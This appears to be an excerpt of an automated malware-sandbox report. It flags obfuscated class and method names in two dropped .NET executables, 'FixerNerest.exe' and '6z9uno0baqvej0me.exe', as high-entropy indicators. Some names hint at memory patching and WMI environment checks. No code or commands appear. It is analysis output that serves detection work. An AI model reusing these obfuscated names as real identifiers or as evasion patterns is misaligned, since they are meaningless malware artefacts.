                      Source: 6z9uno0baqvej0me.exe.0.dr, ZuoBsZuxQp.csHigh entropy of concatenated method names: 'SHBkDQrVYFDLTTvsBYvfZhpj', 'gYWmBNPyZhN', 'eYHZjmwWjUiwgs', 'UKVlSRfWsUjXsoNul', 'eXAnGpvsNVMqZFIouoEv', 'wyBPEAPEhWawOBVYhDgqZEKK', 'vdPEtYqpni', 'yXCofnfzmtLDmPNkX', 'VrorOIWAAox', 'GaTxaJBrKlYKXHkacogoS'
                      Source: 6z9uno0baqvej0me.exe.0.dr, EUTyJunaVjfLziLg.csHigh entropy of concatenated method names: 'eegtQQmoHQzAznEMVfEOJG', 'mpQAlxnqMRkwy', 'boDgKBdnaWv', 'yeCGRgXTuEzQBqUZmj', 'rGItrBizEhyPuE', 'yIoFzEYfJXome', 'hEAqHDUqkLFihTmv', 'FMrrLlhjKTbyWDODeXcxYm', 'qIYdzRWFsN', 'iancWTTHxksrOIrfCwJy'
                      Source: 6z9uno0baqvej0me.exe.0.dr, bRFnUZCCzOQQktsWRhAHLOd.csHigh entropy of concatenated method names: 'TGSpzALbonWVUFvPhnynv', 'aYLwQxxWgMnTUO', 'MCzCpbwXWCLl', 'aYPqqEfteDjNeSHJiBlgI', 'lzkGndBotELMvIxw', 'PjOhyPoLIpOoBaEbFm', 'GkRBrpKfBRXyMlY', 'xunnjvueonAsdHkq', 'gqsxhWrnjmulqBCc', 'GhRzhKpmNDp'
                      Source: 6z9uno0baqvej0me.exe.0.dr, kvAdeNHhLAvFBnSPLsjXnmuh.csHigh entropy of concatenated method names: 'KkybJPQqfTa', 'wipTLzNCqsPo', 'CNYRIyBSZUdIGClePVTrGOJtE', 'mhfNRUKeGBsYXVZqXO', 'KExbXbXvwqoDf', 'gLTnMCIybvkmq', 'ySQqvguXpGImuZNoSxMLrJFCL', 'DLcBqkkYxdaxI', 'SIWNfZIjlndnaeHpNNfjdjuoP', 'BWbjNUoOtinsXlDUa'
                      Source: 6z9uno0baqvej0me.exe.0.dr, ZAbCfCqEpIJbZTdz.csHigh entropy of concatenated method names: 'lMkuXZVQmvhalwPheBIO', 'CtuNkNjquMbXlNsBaCaF', 'sHJdDMtuuRVlziTqhmMla', 'iFDAjXgEzhIxKmkjgAqvzuG', 'meYKtPOTLzYEaDdWOpSnc', 'YgGxFLveso', 'ROEyVKjTolKOgJdWUhKcSJkGs', 'wKCXgGkFJpZ', 'sfiUnQNSZncpbwiLf', 'dxGROZQRFDeb'
                      Source: 6z9uno0baqvej0me.exe.0.dr, iVqXiRRWbtTaFgrOCj.csHigh entropy of concatenated method names: 'YJwawjgILPSRH', 'bbkjAnvjKbzCCwZtLGH', 'VTlvtnCJFGJcMudE', 'fBvPpyVauhji', 'ELJnKHqppNkleES', 'pISUmgFMEgVQUzFSa', 'CxTZjWOSqnLdLtDDFZQOfY', 'xjemaVqHSLq', 'UEQYwFUpRA', 'UbMRugBMHerVpFjoxz'
                      Source: 6z9uno0baqvej0me.exe.0.dr, BeNEQBpvCUYMUQvO.csHigh entropy of concatenated method names: 'XmhJotRMrlZrDmPUAPXFV', 'FfmVReXiQT', 'fdcMNMlvsYQQ', 'zhJsTAXIPVg', 'WTbnoJVGjX', 'mHnCmKdepPjV', 'UfOPvzQIvKqtJHDOvJTcY', 'kgykxlqrmnxrTJvFK', 'GArxwIcDZPtFPtLxuhQLB', 'RDXDwSouTpzkVYfnjpH'
                      Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.csHigh entropy of concatenated method names: 'pvkIPFGCSkUuaiSakf', 'DDDjqbzHeeclvgGp', 'KkakfDiBwfKYVVbOUQ', 'lMtgQxbXqzZOUsrPz', 'kYAUhuvpjJJ', 'WbQjDPQDJn', 'fsCXRqgdFbI', 'rWRezkbOROpcxxlobyvvw', 'UcfWeyCgDYOrYMml', 'SiZmRCaZTErBGfN'
                      Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csHigh entropy of concatenated method names: 'uMCOJPwusgMn', 'PTXkYSNOqJWmprPoquZDj', 'VYCJTqPPHYBluatzagls', 'CfcUXhGClmj', 'gyzhOzXzbB', 'kDxovrUtSrfSsapvIJNVlRiNc', 'RMhOtcAirQatLKQtRLAfHHYD', 'pNgLSVjLBZIMEx', 'RKjZVPxCEs', 'XMxmKndzDO'
                      Source: 6z9uno0baqvej0me.exe.0.dr, FeMXZbEkIGjJgevW.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'SWUgQdUHKXCuFjoLy', 'roZsWKRBZOrvYxlj', 'OvZynxCHmSjPwJch', 'PJyZAKOPDFP', 'zFJWOaQYWErWkj', 'hldEPNUhbkvNlLjjrnsnNat', 'jMJhLSbpQSgdaBzBeXil', 'MeNnUzirweHsvVD', 'mWIJFxTeGJq'
                      Source: 6z9uno0baqvej0me.exe.0.dr, DqloyPCLKAxwlGUiNTrkNgO.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'gHevnUUNJwNuWDCjJuZrjVqjS', 'lOeaFCHQdWAhvAN', 'AQZpTbUtpQex', 'KRucUiFjjqLmFa', 'ibyZeaVZKdyKulkoXJC', 'FFEbRHYQZNDOBpK', 'SFTnprkzVYLyzB', 'cDHadWXHWCEAwakJFaWWRq', 'dOUFFtwZRXZaKt'
                      Source: 6z9uno0baqvej0me.exe.0.dr, FaWSNiFOezDcTYVZCPLVUHimA.csHigh entropy of concatenated method names: 'aFVOrfwcWXAYK', 'QIRzuExzUkYGtUfysk', 'AHztQIYfqCyYeEj', 'MqirvPallpk', 'cxYfQFKTROBrWYGwVLuCK', 'SHJsWkhOHaXnDt', 'THYuPnxprVXJdPavibN', 'QVYjZmCHbUiVNSCDWHu', 'USRWzbDyhfpMqNNxjp', 'dkqNWnBvLNWYagkK'
                      Source: 6z9uno0baqvej0me.exe.0.dr, NmTBqnwpsuQacpSXxPF.csHigh entropy of concatenated method names: 'xuQERGGdzsmey', 'cVTmmTFkOSqSyIviF', 'ZXhTWOjjhTp', 'IlbFMwDLcm', 'MfxNzHxhRmh', 'apJzFCCmmuO', 'EqtvyeucnRVnY', 'kbjmYObhAP', 'xyJZzTSRnI', 'OBimsERJUWaE'
                      Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csHigh entropy of concatenated method names: 'UwIbcfQhBviOX', 'cHxslOlqBYCceRobCYTdkZ', 'sJroPreddJ', 'ExRVmvaevkZzBzsZtJvtC', 'FFjtaVzWuZ', 'tMqKgmXDGeRTJqp', 'SlThPiCsLlsVFfYpz', 'ImBOMWYqvXnlaDlyglar', 'KKyyvuBxbFb', 'ciCUDZwJZneFaLpk'
                      Source: FixerNerest.exe.0.dr, kInYBznLcEoeuDSs.csHigh entropy of concatenated method names: 'yWUqFwYbPOyiIfALmotlTxK', 'HotTDfGtAOhQjefMP', 'llpcTYoSIOZGWAMxiQCEYjHEi', 'yjcHJgWWMZheVUekXsTtrgDl', 'PKKYCdkuYaEqAEsjzonPDvhZ', 'MOkoDSgqLuWMxJvwkwuZtW', 'bKrrQWsTclkpOAGVIYAoKW', 'BerTTzmzuqbJeLaPU', 'ataNUgweamBthdE', 'pNYDZUplqznqbKiJgWjdw'
                      Source: FixerNerest.exe.0.dr, uJXvYHzEhxLOfc.csHigh entropy of concatenated method names: 'SNWxJjZpddDWZAUIe', 'dlfCzIGMwkhjbfRrwqr', 'seUTuRVlaDMphkC', 'uPOOrxnoHtCXEhEeRMmzQLI', 'mVlsYsCqdaxgcdavqfMA', 'xgsziYVyCaiHfb', 'LvQPrLuekYComqIl', 'HUpottpUgsazPYwBEjvOwJCDC', 'agjiHupiALlg', 'CauKTTeVAFmhGMW'
                      Source: FixerNerest.exe.0.dr, vTsoiPoBagCkfnEE.csHigh entropy of concatenated method names: 'AGXlggLTczEETmLnHvVvVfz', 'mWyAVsqBZzpXkkPmgUG', 'kxGurwXriJVUHrz', 'iLyjICeTwnCWg', 'PAZiupPEJYUySQeVQtlE', 'VVWHiSmxDuA', 'zuUuYwJudBaOK', 'OpbXJlbeueDbMWdHGeUn', 'WKarwbKbTvHxyEx', 'fkPjVAprxknRWuwu'
                      Source: FixerNerest.exe.0.dr, OwtFvyBkOpRRzc.csHigh entropy of concatenated method names: 'DCLFoZlKenZ', 'CgtqbJuoLKkbarxoqh', 'DPnuJlizndmPSVVyDVyqH', 'ottRkewcwTw', 'VNPmkFsKHL', 'uSFFsuTsreybuBsAE', 'LgTSRzIjQl', 'yxycUyyfZDhdaFWXlVkrEnH', 'eFcBGwJdizthAyZDtVfydDsN', 'bXOgtpKpCyPWwYcuEvaLpXmv'
                      Source: FixerNerest.exe.0.dr, ogkoRtQNRnFHYCnvNGTSgt.csHigh entropy of concatenated method names: 'oOnwkySUEoBZ', 'FbzfjIHajOZmiphQxTIvYwZdx', 'PySATXdopmGojYmgFAO', 'CIkEHUteZJBVi', 'tIIivBJtzvJ', 'kjJrrZPneGNO', 'yezOgklGffdYWEMAIJpuxjJ', 'iRcFuZmutpwXKfSL', 'DEEgSUUCmWwYUvPUe', 'OHfLGsiehHoqcrdVufF'
                      Source: FixerNerest.exe.0.dr, iICVrXHYKfHIpFQXbL.csHigh entropy of concatenated method names: 'rFzCejHzsNZCU', 'HSyQLGECpvftBnpvEGjQsUj', 'XmjXOKldmRh', 'RGQFHoQEXliTKwITSDynir', 'YWgneJBGjGBdypdJDEfjlDQ', 'RBRKiTuFaOriaA', 'uVfyMITKdptuiDIHUGTWd', 'rXQMwDkyujCSkNGFDFyqnVo', 'LBRGWcGeIBdHhALPa', 'uKrQSvBPCNXmEWisBvm'
                      Source: FixerNerest.exe.0.dr, lczhEUcowbNWQ.csHigh entropy of concatenated method names: 'nrEZEgZidL', 'ImHNwZvxzK', 'vnnRPpKUMKNBwpKLnJm', 'zngwhUbABSZ', 'rJwRmmQjYJyqulL', 'lOHnMHfHHqkvOJSuk', 'JmssYAtCepopBwICOnKlEkep', 'vBUVOqEGybZft', 'HuJcpSRonnLuejzrYICicz', 'hQykjCUjWVxDruIoW'
                      Source: FixerNerest.exe.0.dr, prnQkWxyXENbjeKZECPLhTnn.csHigh entropy of concatenated method names: 'RauDLZwfTJkJZrHXrU', 'ZSRKucRvGrMVEzoSwCuMeRv', 'UaPeKInqzwNJAP', 'btdqnHofJl', 'KVwHLIWBqTMnlxDVV', 'meRgBTSBbIIf', 'GtlxSurkFnzZhPGssjlSXXHH', 'TcpKhOsKXFtAAlbeXgr', 'GUELIiYWMYjldTz', 'CaYZGPJJMrryKoz'
                      Source: FixerNerest.exe.0.dr, MWYDrsjTSJqoS.csHigh entropy of concatenated method names: 'qsTFEGzLlzHCnRKh', 'kVZucnSXyOYrEpBhFA', 'TrOFMAkZvpESJk', 'GTtYNEBhFsaThJGUiRwN', 'VQMtsNXiuwPGVjiogmJS', 'INmgCPpUWBMXA', 'DheVqezLvLMMaYgBemvYM', 'aMpyiNYvCj', 'yeGBRSoKxRaUppQo', 'WabbYAGRfsvlnzId'
                      Source: FixerNerest.exe.0.dr, ISaCjfIATBL.csHigh entropy of concatenated method names: 'gQsGvyIMyhFUMUyq', 'HdBWAJnBgCIBRMzoDmeHq', 'sdcEaNFqOgRPMYKzgHF', 'OwAKgUGgIiT', 'valXtviawqnbjCAadEFX', 'mRvdSXFGZh', 'NjTlnnGkYfHXIYaeUfC', 'cwgJIpuaYcT', 'JHOAjOnqxVyWeumEr', 'lbXcDRCKcxtfMwMkOAKauGs'
                      Source: FixerNerest.exe.0.dr, JMLcPxDFGCfojQLRgfkS.csHigh entropy of concatenated method names: 'TgKyLZaRtKtJzsQ', 'gtWFAthDVcgaJGHLH', 'qfBeDYcoNslfkY', 'sAmOMSZyGciszHmCiBjBkXBp', 'dMgpRqsIfRFVxvxRguBVfdgap', 'eAWKUyxQjGt', 'plqkTqghkFlk', 'dAUSzfFAOMr', 'VxHYgLrXXFQevJqtISYPm', 'qydykanIaYy'
                      Source: FixerNerest.exe.0.dr, TJTvwBaIBQS.csHigh entropy of concatenated method names: 'fwlmloNajoHIlHgMA', 'HXgWEcAWhAJvnIgLMZ', 'mxTiaUeBKKoUNIaIvrIrJm', 'GMQoBycZvHXNeo', 'FCaapLtfwmNzkTEhgAiMWK', 'dDiktMpuvUGlFRixDNg', 'BozrFqarNvbSvWwX', 'azTGsRfeizPx', 'eyppeoDqeC', 'yhAsopjULqcNNOJXTNXrK'
                      Source: FixerNerest.exe.0.dr, UhBFJdricqufqaojV.csHigh entropy of concatenated method names: 'ZluADFKYEZvUcgzYxWc', 'LcxxXJKzdEkHCbwweT', 'vvkYRmHNOfRcRHuSwnw', 'tuLvAonSBjDtdtggbE', 'KQwwTLbTAIJAIiqjBko', 'dzpMecXzYbNqsHlMx', 'rjYVnKsjuLmJewmfCLajSqncv', 'uSHBwemDsEzHLfUuh', 'MOwREMFalOfBw', 'aOQZctOIXaEhguzvPXIaPgcc'
                      Source: FixerNerest.exe.0.dr, WVihDmlAmRFUAdyEhT.csHigh entropy of concatenated method names: 'lcXdxSUGGnfVPqVnN', 'dNfzaclAov', 'DKYDOEzzsl', 'jfeNHvpeeqlEDF', 'mCurxeYGDcGRBlWnUOOdzUN', 'qLKRJRGUxVSxFBok', 'ZbkBdnsICRppc', 'SoYAmUHwmWlTgTYiTaeSatd', 'MXRIHAQfVczIgABQ', 'dpNPKHYjTxO'
                      Source: FixerNerest.exe.0.dr, KxxSSIzaCTUHBCvRNLqyDXZ.csHigh entropy of concatenated method names: 'TgaEpLqydIyuWCaHNS', 'mhcftdlvvpWnmYUymhulqdVe', 'DBvKkjllbnvrAhbEPuJHUMW', 'DoZThFJLym', 'cqlKFkCKkYHlzTgbiMWYrf', 'GwJSDWdksNryOejDXSBlcvDZ', 'AeaycOxxwe', 'wRyoHoPXIUSwyJ', 'GqtQKsjSDrClPzuBRzVHFUMdo', 'fRfhhcpdIHDfTVMzuwE'
                      Source: FixerNerest.exe.0.dr, LORYroboCXxqjpTmhsXqFkvZK.csHigh entropy of concatenated method names: 'ArLDvgByOLypWkkSBihjSpzIh', 'sVsaSsNtokczcRpk', 'HnrWmGmiNsaeLrDWco', 'GntGbcwzpCGPthOrUpx', 'OFrFznPcsZc', 'cJemOhQupG', 'gGchxxzjgeiQBwoGoNUHQZGnk', 'bdmZCQIHLyX', 'RftpwVtscqZ', 'bgVzgHzpwtVVwHbSIt'
                      Source: FixerNerest.exe.0.dr, VoFTVipipkK.csHigh entropy of concatenated method names: 'VMantYKYfAnacPRV', 'DQtAcwiaBZQaoUKaKqmcuoiCw', 'VBfrFRUkmUQUsPsMs', 'uxqfdzRZesDOhrECbhuJTzFEi', 'JqyWkhvjIzjpXfagmbhXmZ', 'pnKSjfvrmxnpaaI', 'VSyjETmJOjmM', 'XKDkZJjZPMDNHwrkpzF', 'SLEoqLVAADzsiNPmkFB', 'YjGGuVxXvZYkgiL'
                      Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csHigh entropy of concatenated method names: 'iJnrHhQxpVf', 'afkSbpIpfAFPRx', 'noTZewWYBUkKLSu', 'nCHXoSFTOuYXiEXaKQdIWwBTE', 'ixrewXlCRNJa', 'VizKjXzqwwJAvplcqA', 'ThjHbjxAmgmKQjnHaWlSvE', 'lAieBizZaMVHvlb', 'blXMJJmtQIhLFFisO', 'xGtFwRnGMyucrWz'
                      Source: FixerNerest.exe.0.dr, gBeJmXXsXHezdPh.csHigh entropy of concatenated method names: 'eUDcfhQyzzyEOUmAxDQN', 'lmsKaeQoSgVylMzBA', 'ylfJmZSeDVdBZyULthLSE', 'zJhSdFcHmyx', 'RbrbzTrwbvLRHWe', 'TSqihvmVcUvMBwjeEI', 'sUSisaIcEyQLGbCoUIOk', 'pVzfXfueLgNzqmFBk', 'HYSiXLJplyIPVpYJDzSCVvNxs', 'DMQpwnjLGLEHynW'
                      Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.csHigh entropy of concatenated method names: 'LvCpvdStvFLfKcjkzIm', 'OTwhHeTfhdsyCEsB', 'FyRyFitGWcSvLUVgQQryVi', 'JmLRMNcFjivuJUW', 'lDakBAkVJWRm', 'BDUXhIMuQgtuWjNQaMLtHF', 'uxPICpIqvpSiebWbMKOUWhpf', 'XFiKFsgvIZZSAJE', 'qxEEAioEkzjt', 'ZNIkqfjZfpxlmWCwJMAJM'
                      Source: FixerNerest.exe.0.dr, QEEFRJhvySTxMB.csHigh entropy of concatenated method names: 'aDNCrkYOApwXNfzcDoeqHTo', 'oCobulrMvsWPQUkcspDQVmTP', 'qPIhKkHPTNpwwUPxjcUJjMjEB', 'SPXYCiYcDViflIPAwGugvUoSl', 'zGPegEfLRrrvL', 'YTQtPErLujPc', 'VCxaFmsjSNZp', 'zZqXIBvmIbEvDhSnLgO', 'uKIUQmISYFG', 'DlFRVWaOgWNasfBFZvGhKmi'
                      Source: FixerNerest.exe.0.dr, jZWTVmmWOyYUMMRcqrgzxt.csHigh entropy of concatenated method names: 'ebNNwrzjWnUktguoiZGMylOI', 'MzLyzOspersHZpfP', 'CgscXvwDxaqhwt', 'EtksnlWZbuPoC', 'JjbxjihQroDOuBnCHhy', 'CfFmbefHRhIGuXnrOkM', 'foCvoYqUlZmiq', 'dedoVFDazJgwUXNwn', 'UoAOcJxCnKWrvaQXt', 'NZOHHEpsPsET'
                      Source: FixerNerest.exe.0.dr, jDcxkJFhdsO.csHigh entropy of concatenated method names: 'ZVTlUGzgCUxzHTc', 'pLyoVESOrBkIzZvCXj', 'MjNkMsfBPGdpQhesSuawUD', 'tSVqgcZubYd', 'rcalvpCDHNMTbV', 'dIxnVJfTSqCzYpMCRmRm', 'rIfGRAwfFCOKvw', 'dlIGMIHvsqeNvLvgKjRlA', 'gDJinMnnodsaYge', 'ZHjMmPnmBUKWD'
                      Source: FixerNerest.exe.0.dr, VgiXrAmmXM.csHigh entropy of concatenated method names: 'RlSpcTxUImVHRJThXP', 'UFtJFrybKqoQQdWbgICKPSM', 'PAZQNYTOWgsWXcMy', 'rneUWEdvinYVFcBsZtF', 'iOmWZtklADDvEfX', 'izsvvVekutRDrdyiHfw', 'BHvdTruejdQZEVJaBJW', 'jBcfbguXFVoYj', 'ebEPcDbAAQcrzVTXhxJjtzeP', 'mxWYOospJq'
                      Source: FixerNerest.exe.0.dr, EiphzSFywDsQvfJ.csHigh entropy of concatenated method names: 'UguORtUtzui', 'dkKlBYhllU', 'PQlvpndBHrv', 'ulpsNbUzFBfoNQWBjyB', 'AZfxgyeGWsbIhFQA', 'fUKRUAOlwiYQb', 'IqbeUFrMPwNdNZW', 'HAWpDeqCfYQL', 'QGpuZSSGbwuUTFODrnoPp', 'YumPezZyvofczqYioH'
                      Source: FixerNerest.exe.0.dr, nkKpBsREeeBrrJgLniKFn.csHigh entropy of concatenated method names: 'uPkrNGBgDoNjgrSgOmrox', 'tJdcdXdhIRyApvFJfLCy', 'NeIdpsHUXOypNVbNkc', 'CWfvlfBXaEHglzFgfUz', 'eWMkDzLcZdwuiYvEhiXynU', 'QQiNpHpwtlozgKuslTZ', 'xINxNDBywxBAJqvUUmWUkgDJu', 'PumplfOWiICkzlGrA', 'jnpqOZXzwFOQFDDpoHLGLWmn', 'nSkmkNsgHZHi'
                      Source: FixerNerest.exe.0.dr, DDkXafHupjcDyMCFpVaefrMq.csHigh entropy of concatenated method names: 'qCGRdOsVhMwopUbX', 'jnSGDElovbagPMrtBj', 'BdLVjhRzGQzBzHCIZY', 'nyUdhmSpSAEunk', 'WzXRjZmEfXvZaZNDSVmwdgzei', 'ryzBWMRAkCkHopA', 'pFlNsPEwmZBoUpAtjShnEdBj', 'aoKTKgxvjqts', 'YbuDOwKdfuCrXWHN', 'LECFRbtdbtDslzGBOtFtAP'
                      Source: FixerNerest.exe.0.dr, OLCRwsTtwxxSGZuMngxi.csHigh entropy of concatenated method names: 'STWcrGlCPAYMVdXTCakSo', 'EXEssEuclOoxwsgoE', 'hrgwYFkwWskGMPwuOyYzO', 'HnPKYYhfmOVykwrHyyHw', 'BreCYBCdhQEYAjshOhMP', 'FWkNfzCGAZsRAFwkIzWfBFx', 'akNzakQugqwUtot', 'zXhqLGzdww', 'hqkpAZTnumC', 'PJylKJbrTFUfeXGFTkj'
                      Source: FixerNerest.exe.0.dr, JqoyJMwYkYeSSSLBCERtJfL.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'eiLcBLWnxSzTbooKAH', 'jdfmOziWNDFxt', 'shTrcPinsNklrCmXVRYOlwywx', 'TpJjrUFVjGVTYscvlSC', 'IfkphnZeMviWtzvseI', 'PfVTfCCtglpKgtVV', 'FTBDubJoYyZZwjRdwmwmME', 'fustWkCcYdHnKGSUEMfHE', 'UkBYhkHYicAhWJCimD'
                      Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csHigh entropy of concatenated method names: 'xCQxqDhktAiNXUabbXDUuhnau', 'tGJXUzpZsyZoNASUCMZJk', 'rXnAeZCPPqDFKaaVgjX', 'ccBmJDCafaAkANPljUVQWcijl', 'pstggqmlDOVB', 'aXcjopSFwKplLNHcztSABNK', 'zuKyOKBQidutustuTCsh', 'uUcfJDVDApN', 'ukueUqmJZDiTO', 'GzXhyUcdEZiTEGfMhohg'
                      Source: FixerNerest.exe.0.dr, avfHckAjbIOftjcvbDvZXrf.csHigh entropy of concatenated method names: 'YzCIvbnXWQBODZHdYFCd', 'NKwQlKHrQVjPyjchr', 'zUrIdiNsBvRASoBJKpGrKQ', 'fFvSzEqevhRCJgEhNCs', 'LZQDuOpYnbzd', 'oLDhQOoLRVSAlscGHspR', 'UGprXkORrUhn', 'UVAzxnEwuDxCIVNR', 'jKMaTENqsdZuZBlNSYH', 'IuBMMaCspOP'
                      Source: FixerNerest.exe.0.dr, XOWrfubIFwwWSRBCkfv.csHigh entropy of concatenated method names: 'GzXbQMXAGN', 'mwxeQIuYrPpc', 'GQHFLAVEzNYYrvaTWaCrnJZ', 'mltpHDkRXfUAESpG', 'DniZGZMUFVonkExqmSZGgxv', 'HBMaaOElvzkVqvgMhVB', 'wdmaXKSzPzMGrFRFNlur', 'DrkUbzqmNZKwMhd', 'lDQvEVvmdeleaz', 'aKSslBFwKbMBaBKeYorbievL'
                      Source: FixerNerest.exe.0.dr, UACsUQnggztSoYk.csHigh entropy of concatenated method names: 'VdSINmzcYlFUDFbLWy', 'fqUxahHlBoZLppD', 'uGVDiBZTjLSdbYhvpFF', 'AgsaFAyozZPezcgFBvkeR', 'OOOdKcHeWj', 'QcOOuxhClUJvodzrcutVa', 'zRdMbqVhVDgujzRq', 'yCbfgETazKke', 'cNJvcwliVrhEyGPuuzaln', 'TzpSNJlcfkClbSkoWUFYdLub'
                      Source: FixerNerest.exe.0.dr, JfAFbFqmPAXuSFACrag.csHigh entropy of concatenated method names: 'RkDnIXrgyetV', 'sVHoXFlXRvG', 'epDDikiPXN', 'cMxDNKolHBpajsOTV', 'kzpwkehncPuKFgfxebaBXNcK', 'ApPTLUQNUnNjgcSWaiYqwwIum', 'msUXXWfxkpRTRu', 'xktSOyzIexfETCEgVhx', 'YsxQqEirdEGQdNzLPcYO', 'kpZrSLvgIwlTMEEnccKQHe'
                      Source: FixerNerest.exe.0.dr, fxrViPtroaCbyONKrcHijo.csHigh entropy of concatenated method names: 'cGXWrGRrNpktfJDBwyi', 'MCfobByeOtYEqSPP', 'tBkWiomOVhBoa', 'kBSSZbjvpHncU', 'gCNtoqDwxzdOsZF', 'xqoioCXzpobxMdjF', 'ViSUHzkHnEToLiJp', 'JxolcdfNDAPGjTPY', 'XrnzqqEbAxDKeGRHrTmQisEn', 'DzUADkEQRKS'
                      Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                      Source: FixerNerest.exe.0.dr, AgGuxbclsJDKUXCF.csHigh entropy of concatenated method names: 'PgBtGwUrqzqNZCUoKeqOHE', 'uciUipnmdWskfbbukmD', 'bmYTGiVKsMrg', 'AGRXclBCMNqgS', 'NikFbDwDHDPNAUcuQfMZeU', 'XHABEPZhmotIb', 'GPcOxzNHOlha', 'wLTsKsYMybBrniW', 'ZGMAlKPjKgVwPtOUex', 'VTvjPDvIobXKQreofUZ'
                      Source: FixerNerest.exe.0.dr, NCWTJiYmOo.csHigh entropy of concatenated method names: 'fdXRNOXStt', 'qgnMDAxeooZwPsjKWKTw', 'HeaGYfIPuIRJgLpfweYojzNG', 'HZdEBIZwljCMFeUpPufH', 'jgteZfvHMIRUZRGeLtArN', 'cnSrADyUFhyuYskZbceoZalr', 'NOLEAfPZoEGMifrIrDjW', 'tOumSXNYVBCaKnpnQEC', 'UkodNsxnfhXBVBUzRSiH', 'ASCDlYsCVb'
                      Source: FixerNerest.exe.0.dr, qmajBmcCnsP.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'akoWoQJegFQzWGz', 'sLLtHQapfaLkpD', 'GhBLeixaxKaECT', 'FDgyYJtcIK', 'yqNEYpdrKSVuU', 'ukOigLYWdVIEqeEMEsBU', 'HMsllbLJjkILQeYfubylc', 'swUyynxOdtAxn', 'VxvjMMtlztaAfhKQC'
                      Source: FixerNerest.exe.0.dr, JjNonPeEqnKrhUWFcwVNuQ.csHigh entropy of concatenated method names: 'HumVdnzFHHCRoAp', 'svjgfSSfzqHTWdUvtQGtB', 'ARrhDkeCiEmKcSLjnocHVmgf', 'dmHYXtvlxuSoyPhAxICh', 'ACkJcSRtYNlMy', 'yXeKLqZfXsupYuHYed', 'WcjXOvberZhhczpjdSyrrmVer', 'ntXmAjHObxOzPP', 'MiFqKSpjKeFflGkGFfAIh', 'EYyZNYrUdCjH'
                      Source: FixerNerest.exe.0.dr, XbJdqTwlJhtvvHI.csHigh entropy of concatenated method names: 'cQQnOSFXJkniwgH', 'CtFVrLKWlIexEaFmY', 'XIDtCEWlTGfNocZTtBCm', 'QGuBFnHTjfAKNJzVJr', 'yFrEqYTCXk', 'DklHGCJsxQPSkbeDbSax', 'JAoVYBDdlljjCbQYGCxMQ', 'kjnHdLUsjxmwujwliAFPLefi', 'AOfUQdlTPQFhRYrItCmw', 'ggbUUwGBiGD'
                      Source: FixerNerest.exe.0.dr, TpneWzinmRLNNvomkAusssN.csHigh entropy of concatenated method names: 'IuRdXCfNaLeGuJEFSv', 'zBBLzbjMHFiAa', 'LVbhFPjlxnBRhsbwpa', 'gOaHiRBnqYIrKDfincXNfcODN', 'itrkLPIDuNlOt', 'DctNpwrNCJoTRM', 'EzXtYjIvFMsiHJS', 'ZjHKDiBNRSUriwsyvlpNOUUgv', 'oBwNkEkMPjJCOVyJcFO', 'NITunVTEjEPbPXu'
                      Source: FixerNerest.exe.0.dr, MtweeSvrtsEjaEHkGcqcH.csHigh entropy of concatenated method names: 'DFiwVYdhZUOx', 'YRQgkFOHierWZwABKbbd', 'prwiwWNMSkU', 'WiSpwGWsAVaqZwccgP', 'nUcjaUxnjBuPuXuCNhLNUEk', 'TQFIAukgDrh', 'uzsVyTnrFFfT', 'tOuUBXikZPJPpmpQNMD', 'mIOpqPBQtyOkldHfpMBTyX', 'jjGJgybrtcetlAFe'
                      Source: FixerNerest.exe.0.dr, vFtGvLdAuIQGYPbHNoGtunigD.csHigh entropy of concatenated method names: 'BohTfzMQNzNDrnTSGfvSzctK', 'kQyFHWNDAJoSadRuICctK', 'SabgDkkwZvXjuiNKFdAzqdeAg', 'eYraQRZnxY', 'aScSDktvqiigxwzsKGo', 'bABGMFyeFKHlpgfKXhntlEpT', 'rteRYOhIcCZRWGymOqgbxrQR', 'VdTvKWLhKVLUNhvZcMeFtB', 'oHXOIsyzcMdCkONSfO', 'LkmRAIkBVfmMuUCeomICo'
                      Source: FixerNerest.exe.0.dr, OtMRnVOsGKHl.csHigh entropy of concatenated method names: 'OaJVtSKEyPaxQqAqb', 'AYiHvMpChJPGtAijBpNMbGp', 'PelUWeNCfT', 'MqHfxgrkBosV', 'OhpLdOPujgrRaUfDv', 'batVtuKPgkWnNX', 'LFppCYRDMdKP', 'XMLhFbQvgtnuBN', 'fYvSTJOOqNtoKWgrjexs', 'YohmHMfMBuBLjYoi'
                      Source: FixerNerest.exe.0.dr, ueHNMdjwjYBvgC.csHigh entropy of concatenated method names: 'KVvAMKuWDzYAKXvnmxTAjYSYH', 'HXDGRMJZqUXHDFzIEOodZY', 'lOxMCNlCXtXCXSwiLrkgaP', 'uOBbUEkdOjjSrTzGLFR', 'OfCbpHgcmo', 'NWjDyBlQynPJToAEOMkYbJO', 'OMZmMXIrasVwIQB', 'aoSMyWjnpCR', 'CPPDHSombzDbfX', 'bSDwyLeymqBSsclwKGsp'
                      Source: FixerNerest.exe.0.dr, WYdQIVjMOZZzFKSg.csHigh entropy of concatenated method names: 'xVmIWWPGmNsQwHeZFZzsKD', 'NuZjXgamrjtndQMzBOKVIqvS', 'vZAlToetaYNwnsa', 'aAhCTAJsZydAh', 'WzHRbHaBYuPtDryDNVjJi', 'NPyuPHLUKdMnCOpWQTkZbmn', 'xSuWkIRYEflrShrTp', 'jlhPokNqFQZ', 'ObbZxxNpjCMn', 'WcxEjbQkXCCrhdJIuCAz'
